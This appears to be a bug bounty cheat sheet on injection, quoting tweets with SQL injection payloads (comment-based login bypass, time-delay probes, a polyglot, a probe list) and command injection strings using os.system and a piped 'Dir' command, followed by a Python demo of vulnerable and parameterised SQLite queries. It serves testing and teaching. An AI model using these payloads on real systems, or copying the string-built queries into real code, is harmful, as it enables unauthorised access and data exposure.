# Injection

* [#**BugBountyTip** did you know that the character '\_' acts like the regex character '.' in SQL queries https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php](https://twitter.com/gwendallecoguic/status/1076081365777551364)
* [#bugbountytip It's possible to fire up "#OS #Command #Injection" instead of #XSS in Filename.PDF?parameter=PAYLOAD+|+Dir+c:\\](https://twitter.com/fasthm00/status/1087256089630896128)
* [#bugbountytips When you're trying to trigger a Command Injection flaw in #Python Web Application try to surround your payload with str() function i.e "%2bstr(\_\_import\_\_('os').system('whoami'))%2b"](https://twitter.com/fasthm00/status/1087557729797824512)
* [Use Burp Intruder for Expression Language Injection and grep the response for 7744 :) ](https://twitter.com/secalert/status/1119526862521282560)
* [I found two SQL Injections tonight in private programs. One blind and the other hanging in plain sight. Here’s a tip. Wayback -> http://company.com -> grep | .php?id= ](https://twitter.com/chevonphillip/status/1237968363764187143)
* [Give this a try while testing for SQLi Authentication Bypass:](https://twitter.com/SpiderSec/status/1251793902996279297)

  [username: `'--'` / `"--"` password: `'--'` / `"--"`](https://twitter.com/SpiderSec/status/1251793902996279297)
* [Basic payload to test SQLi in Burp Repeater: `'; waitfor delay '0:0:3' --` Check the time in the Response side if it delays the same as you change the seconds in the payload.](https://twitter.com/Gamliel_InfoSec/status/1191518957838196737) ![Image](https://pbs.twimg.com/media/EIkgLMAXUAETnq7?format=png\&name=small)
* [This is how I found SQL injection 100% of the time. For http://site.com/?q=HERE: #bugbounty #BugBountyTips](https://twitter.com/pwntheweb/status/1253224265853198336)

  ```
  /?q=1
  /?q=1'
  /?q=1"
  /?q=[1]
  /?q[]=1
  /?q=1`
  /?q=1\
  /?q=1/*'*/
  /?q=1/*!1111'*/
  /?q=1'||'asd'||'    <== concat string
  /?q=1' or '1'='1
  /?q=1 or 1=1
  /?q='or''='
  ```
* SQLi polyglot `SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/` by [@avlidienbrunn](https://twitter.com/avlidienbrunn)
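The following is an added example, not code from any of the tweets above. It reproduces, against an in-memory SQLite database with a constructed `users` table, the three mechanisms several of the tips lean on: the quote-and-`--` authentication bypass (shown here as `admin'--` so that it matches a row in the constructed table), the `/?q=1` / `/?q=1'` / `/?q=1 or 1=1` probing pattern (a stray quote produces a database error, a true condition returns extra rows), and the `_` wildcard that survives even a properly parameterised `LIKE`. Each vulnerable routine is paired with its hardened form; the function names and sample data are this example's own.

```python
# Added example (not code from any of the tweets above): a minimal SQLite
# login/lookup that reproduces what the tips rely on, next to its hardened form.
# All names and the user table are constructed for the demo.
import sqlite3


def make_db():
    """Constructed sample data: an in-memory SQLite database with three users."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users (username, password, role) VALUES
            ('admin', 'S3cret!', 'admin'),
            ('alice', 'wonderland', 'user'),
            ('bob_smith', 'hunter2', 'user');
    """)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement with string formatting, so the caller controls the SQL
    text. A closing quote followed by '--' comments out the password check."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Bound parameters: the input is a value and never becomes part of the statement."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def probe_vulnerable(conn, value):
    """Emulates probing /?q=1, /?q=1', /?q=1 or 1=1, ... against a numeric
    parameter concatenated unquoted. Returns the row count, or None when the
    database rejects the statement (the 'error on a stray quote' signal)."""
    try:
        rows = conn.execute(f"SELECT id FROM users WHERE id = {value}").fetchall()
    except sqlite3.OperationalError:
        return None
    return len(rows)


def like_lookup(conn, pattern, escape_wildcards):
    """Username search with LIKE. Even with a bound parameter, '_' (any one
    character) and '%' (any run) are still pattern metacharacters; the hardened
    variant escapes them and tells SQLite which escape character was used."""
    if not escape_wildcards:
        sql = "SELECT username FROM users WHERE username LIKE ? ORDER BY username"
        return [r[0] for r in conn.execute(sql, (pattern,))]
    escaped = (pattern.replace("\\", "\\\\")
                      .replace("%", "\\%")
                      .replace("_", "\\_"))
    sql = ("SELECT username FROM users WHERE username LIKE ? ESCAPE '\\' "
           "ORDER BY username")
    return [r[0] for r in conn.execute(sql, (escaped,))]


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin'--", ""))             # password check commented out
    print(login_safe(db, "admin'--", ""))                   # no row: the input is just a value
    print(login_vulnerable(db, "' or '1'='1", "' or '1'='1"))  # every row comes back
    for p in ("1", "1'", "1 or 1=1", "1/*'*/"):
        print(repr(p), "->", probe_vulnerable(db, p))
    print(like_lookup(db, "_____", escape_wildcards=False))  # every five-character username
    print(like_lookup(db, "_____", escape_wildcards=True))   # only a literal '_____'
```

The `probe_vulnerable` results are the same signal the `/?q=...` list is hunting for: `1` and `1/*'*/` behave identically (the comment is swallowed by the parser), `1'` errors out, and `1 or 1=1` returns more rows than the baseline. The `LIKE` case is the one parameterisation does not fix on its own; the escaping step plus the `ESCAPE` clause is what turns the user's `_` back into a literal.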
